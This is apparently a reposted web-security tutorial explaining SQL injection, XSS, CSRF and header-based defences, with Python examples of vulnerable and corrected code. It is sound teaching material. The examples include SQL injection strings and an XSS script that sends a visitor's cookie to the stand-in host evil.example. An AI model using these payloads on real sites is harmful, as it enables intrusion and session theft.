web security

Common web security and protection principles

  • SQL injection principle

    • The attacker submits SQL fragments through a web form, a URL query string or a page request, so that the server concatenates them into its own query and ends up executing SQL the attacker chose
  • Prevention, in general

    • Never trust user input: validate it (for example with a regular expression or a length limit) and escape or reject characters with SQL meaning such as single quotes, double quotes and "--"
    • Never build SQL by string concatenation; use parameterized queries (bind variables) or stored procedures to access the data
    • Never connect to the database with administrator privileges; give each application its own account with only the privileges it needs
    • Do not store confidential information in plain text; hash passwords and encrypt other sensitive data
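The two query styles side by side, as an added example that is not part of the original post. It uses an in-memory SQLite table with constructed sample rows; the payloads, the `valid_username` allow-list regex and the hypothetical login functions are assumptions made here to show the difference between dynamic assembly and bind variables:

```python
import re
import sqlite3

# Constructed sample data (not from the original page): an in-memory users table.
# Passwords are stored in plain text only so the query comparison stays visible;
# a real application stores a hash, as the page advises.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn

def login_vulnerable(conn, name, password):
    """Dynamic SQL assembly: the user's text becomes part of the statement."""
    sql = (f"SELECT name FROM users WHERE name = '{name}' "
           f"AND password = '{password}'")
    return sorted(row[0] for row in conn.execute(sql))

def login_parameterized(conn, name, password):
    """Bind variables: the driver passes the values separately from the SQL
    text, so a quote or a comment sequence in the input is just data."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (name, password)))

# Hypothetical allow-list for the "validate with a regular expression" advice:
# reject anything that is not a plain identifier before it reaches the query.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")

def valid_username(name):
    return USERNAME_RE.fullmatch(name) is not None

if __name__ == "__main__":
    db = make_db()
    # Two constructed payloads: a tautology in the password field, and a
    # comment sequence in the name field that truncates the password check.
    print(login_vulnerable(db, "alice", "' OR '1'='1"))      # ['alice', 'bob']
    print(login_parameterized(db, "alice", "' OR '1'='1"))   # []
    print(login_vulnerable(db, "alice' --", "wrong"))        # ['alice']
    print(login_parameterized(db, "alice' --", "wrong"))     # []
    print(valid_username("alice' --"))                       # False
```

With the tautology, the assembled statement becomes `... AND password = '' OR '1'='1'`, which is true for every row; with the comment sequence, everything after `--` is ignored and the password is never checked. The parameterized version returns nothing for both payloads because the driver never treats them as SQL.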

XSS principle and prevention

  • XSS (cross-site scripting) is an attack in which the attacker gets malicious HTML tags or JavaScript inserted into a web page. For example, the attacker posts a seemingly harmless link on a forum; a user who is tricked into clicking it runs the attacker's script, which steals private information from the user's cookie. Or the attacker adds a malicious form to a forum page, and when a user submits it the data goes to the attacker's server instead of the trusted site the user thought they were sending it to

XSS prevention methods

  • First, check every variable that comes from user input carefully: limit its length and filter or escape characters such as "<", ">", ";" and "'"; second, encode any content before it is written into the page, so that no HTML tag slips through unnoticed. Doing these two things is a reasonable baseline and, according to the author, blocks more than half of XSS attacks
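Output encoding in practice, as an added example that is not part of the original post. It contrasts writing user text straight into a page with HTML-encoding it first, and adds a scheme check for the link case, because encoding alone does not stop a `javascript:` URL in an `href`. The template strings, the length limit and the cookie-stealing payload are constructed for the example:

```python
import html

MAX_COMMENT_LEN = 1000  # assumed length limit

def render_comment_unsafe(body):
    """Writes the user's text straight into the page: any tag in it is live."""
    return f'<p class="comment">{body}</p>'

def render_comment(body, max_len=MAX_COMMENT_LEN):
    """Length check first, then HTML-encode every character a browser could
    read as markup (<, >, &, ", ') before it reaches the page. Encoding is
    preferred over a character blacklist: the text is still shown, just inert."""
    if len(body) > max_len:
        raise ValueError("comment too long")
    return f'<p class="comment">{html.escape(body, quote=True)}</p>'

def is_safe_url(url):
    """Attribute context needs more than encoding: a javascript: URL survives
    html.escape unchanged and still runs script, so restrict the scheme."""
    return url.lower().startswith(("http://", "https://"))

def render_link(url, text):
    if not is_safe_url(url):
        raise ValueError("unsupported URL scheme")
    return (f'<a href="{html.escape(url, quote=True)}">'
            f'{html.escape(text, quote=True)}</a>')

# Constructed payload of the kind the page describes: a script that ships the
# visitor's cookie to the attacker's server.
PAYLOAD = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'

if __name__ == "__main__":
    print(render_comment_unsafe(PAYLOAD))   # the <script> tag survives intact
    print(render_comment(PAYLOAD))          # &lt;script&gt;... shown, not run
    print(render_link("https://example.com/?a=1&b=2", "ok"))
    print(is_safe_url("javascript:alert(document.cookie)"))  # False
```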

Is there any difference between XSS and CSRF?

  • XSS is about obtaining information: the attacker does not need to know the code or the request format of other users' pages in advance. CSRF performs a specific action on the user's behalf: the attacker must know the target page's code and the exact request it sends. For a CSRF attack to succeed, the victim must complete two steps in sequence:
  • Log in to trusted site A, which sets a cookie in the browser
  • Without logging out of A, visit dangerous site B

CSRF defense

  • There are many server-side ways to defend against CSRF, but the general idea is the same: add a pseudo-random value (a CSRF token) to the client page and require it on every state-changing request; site B can make the browser send the cookie, but it cannot read the token
  • Use a verification code (CAPTCHA) for sensitive operations
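A token scheme of the kind described above, as an added example that is not part of the original post. The server binds a random nonce to the session with an HMAC, embeds the token in the form it renders, and a hypothetical `handle_transfer` handler refuses any POST that does not carry a valid one. The server key, the session id and the two request dictionaries are constructed for the example:

```python
import hashlib
import hmac
import secrets

# Assumed per-deployment server key; in practice loaded from configuration.
SERVER_SECRET = secrets.token_bytes(32)

def issue_csrf_token(session_id):
    """Random nonce bound to the session by an HMAC. Site A puts it in a
    hidden form field; site B, on another origin, cannot read that page."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(),
                   hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"

def verify_csrf_token(session_id, token):
    """Recompute the MAC for this session and compare in constant time."""
    if not isinstance(token, str) or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)

def handle_transfer(request, session_id):
    """Server-side handler for a state-changing action. The browser attaches
    the session cookie to any request to site A, so the cookie says nothing
    about which page composed the request; the token does. Returns a status."""
    if request["method"] != "POST":
        return 405
    if not verify_csrf_token(session_id, request["form"].get("csrf_token", "")):
        return 403
    return 200

if __name__ == "__main__":
    # Constructed scenario: the victim is logged in to site A (session cookie
    # present) and then visits site B, which auto-submits a form to A.
    session_id = "sess-4f2a"
    token = issue_csrf_token(session_id)
    genuine = {"method": "POST",
               "form": {"to": "carol", "amount": "10", "csrf_token": token}}
    forged = {"method": "POST",
              "form": {"to": "mallory", "amount": "1000"}}  # B cannot supply the token
    print(handle_transfer(genuine, session_id))   # 200
    print(handle_transfer(forged, session_id))    # 403
```

Binding the token to the session means a token captured from one user's page does not verify for another session; the constant-time comparison avoids leaking the MAC byte by byte.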

Do you understand web injection attacks (most commonly XSS and CSRF)?

  • SQL injection

    • SQL commands are inserted into a form field or a URL query string and submitted, tricking the database server into executing the attacker's malicious SQL
  • XSS (Cross Site Scripting), cross-site scripting

    • The attacker inserts malicious code into a page; when a user browses that page, the embedded code runs in the user's browser and carries out the attack
  • CSRF (Cross Site Request Forgery), cross-site request forgery

    • The attacker forges a legitimate-looking request and gets a logged-in user to send it unknowingly, so the site trusts it as the user's own action

How to prevent web front-end attacks?

  • Do not trust any externally supplied data

    • Check user input against the expected format, and filter or escape it
  • Do not trust any data from third parties

    • Use CORS: set Access-Control-Allow-Origin only for origins you explicitly allow
  • Use cookies more safely

    • Set the HttpOnly flag on cookies so JavaScript cannot read or modify them
  • Prevent the page from being embedded as an iframe in other sites (clickjacking)

    • Have the server set the X-Frame-Options header in the response so the page cannot be framed
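The three server-side settings above in one place, as an added example that is not part of the original post: a weak CORS policy that reflects any Origin next to an allow-listed one, a session cookie with HttpOnly, and X-Frame-Options. The origin allow-list, the cookie name and the `Secure`/`SameSite` attributes (added here beyond what the page lists) are assumptions of the example:

```python
# Assumed allow-list of front-end origins permitted to call this server.
ALLOWED_ORIGINS = {"https://app.example.com"}

def cors_headers_weak(request_origin):
    """Weak setting: reflecting whatever Origin the browser sends (or '*')
    lets any third-party page read the response cross-origin."""
    return {"Access-Control-Allow-Origin": request_origin or "*"}

def cors_headers(request_origin):
    """Corrected: grant only allow-listed origins, and tell caches that the
    answer depends on the Origin header."""
    if request_origin in ALLOWED_ORIGINS:
        return {"Access-Control-Allow-Origin": request_origin, "Vary": "Origin"}
    return {}

def session_cookie(session_id):
    """HttpOnly keeps document.cookie from exposing the session to script;
    Secure and SameSite are the usual companions (not listed on the page)."""
    return f"session={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"

def security_headers(request_origin, session_id):
    """Response headers for a page that sets the session and must not be framed."""
    headers = {
        "X-Frame-Options": "DENY",   # no site, including our own, may frame it
        "Set-Cookie": session_cookie(session_id),
    }
    headers.update(cors_headers(request_origin))
    return headers

def cookie_has_flag(set_cookie, flag):
    """Check a Set-Cookie value for an attribute, case-insensitively."""
    attrs = [part.strip().lower() for part in set_cookie.split(";")[1:]]
    return flag.lower() in attrs

if __name__ == "__main__":
    # Constructed requests: one from an unknown origin, one from the allow-list.
    print(security_headers("https://evil.example", "abc123"))
    print(security_headers("https://app.example.com", "abc123"))
    print(cors_headers_weak("https://evil.example"))  # the weak policy hands it the page
```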

Origin www.cnblogs.com/jlfw/p/11959875.html